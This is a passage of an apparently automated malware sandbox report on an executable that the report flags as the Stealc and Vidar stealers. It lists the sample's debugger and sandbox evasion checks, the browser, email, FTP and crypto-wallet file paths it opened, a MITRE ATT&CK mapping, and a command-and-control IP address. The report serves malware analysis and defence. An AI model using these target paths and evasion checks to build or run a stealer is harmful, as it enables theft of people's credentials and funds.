Source: file.exe, 00000000.00000002.2281603796.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2281603796.0000000001395000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: AEBKFIJE.0.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: AEBKFIJE.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: AEBKFIJE.0.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: AEBKFIJE.0.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: AEBKFIJE.0.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: AEBKFIJE.0.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: AEBKFIJE.0.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: AEBKFIJE.0.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: AEBKFIJE.0.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWUCHi
Source: AEBKFIJE.0.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: AEBKFIJE.0.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: AEBKFIJE.0.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: AEBKFIJE.0.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: AEBKFIJE.0.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: AEBKFIJE.0.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: AEBKFIJE.0.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: AEBKFIJE.0.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: AEBKFIJE.0.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: AEBKFIJE.0.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: AEBKFIJE.0.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: AEBKFIJE.0.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000002.2281603796.000000000134E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: AEBKFIJE.0.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: AEBKFIJE.0.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: AEBKFIJE.0.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: AEBKFIJE.0.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58503
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58500
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58554
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58522
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-59689
Source: C:\Users\user\Desktop\file.exe	API call chain: ExitProcess graph end node	graph_0-58514

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6A5FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,

0_2_6C6A5FF0

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_003445C0 VirtualProtect ?,00000004,00000100,00000000

0_2_003445C0

Source: C:\Users\user\Desktop\file.exe

0_2_00359860

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00359750 mov eax, dword ptr fs:[00000030h]

0_2_00359750

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00357850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00357850

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,		0_2_6C67B66C
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C67B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_6C67B1F7

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: file.exe PID: 5008, type: MEMORYSTR

Searches for specific processes (likely to inject)

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00359600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,

0_2_00359600

Source: file.exe, file.exe, 00000000.00000002.2281049527.000000000072A000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C67B341 cpuid

0_2_6C67B341

Source: C:\Users\user\Desktop\file.exe

Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,

0_2_00357B90

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00356920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess,

0_2_00356920

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00357850 GetProcessHeap,RtlAllocateHeap,GetUserNameA,

0_2_00357850

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00357A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,

0_2_00357A30

Stealing of Sensitive Information

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2281603796.000000000134E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2054617135.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5008, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 5008, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2281603796.00000000013C7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\simple-storage.json
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: inance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger L
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: ge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|
Source: file.exe	String found in binary or memory: \Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiD
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe	String found in binary or memory: tream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.*\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1
Source: file.exe, 00000000.00000002.2281603796.00000000013A7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\.}]

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.js	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Source: Yara match	File source: 00000000.00000002.2281603796.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5008, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.340000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.2280662984.0000000000341000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2281603796.000000000134E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2054617135.00000000051E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 5008, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 5008, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Native API	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	11 Process Injection	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	4 Data from Local System	2 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	4 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	345 System Information Discovery	Distributed Component Object Model	Input Capture	112 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	651 Security Software Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Masquerading	Cached Domain Credentials	33 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	33 Virtualization/Sandbox Evasion	DCSync	13 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Process Injection	Proc Filesystem	1 System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
file.exe	100%	Avira	TR/Crypt.TPM.Gen
file.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\ProgramData\freebl3.dll	0%	ReversingLabs
C:\ProgramData\mozglue.dll	0%	ReversingLabs
C:\ProgramData\msvcp140.dll	0%	ReversingLabs
C:\ProgramData\nss3.dll	0%	ReversingLabs
C:\ProgramData\softokn3.dll	0%	ReversingLabs
C:\ProgramData\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
http://185.215.113.37/	100%	URL Reputation	malware
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	0%	URL Reputation	safe
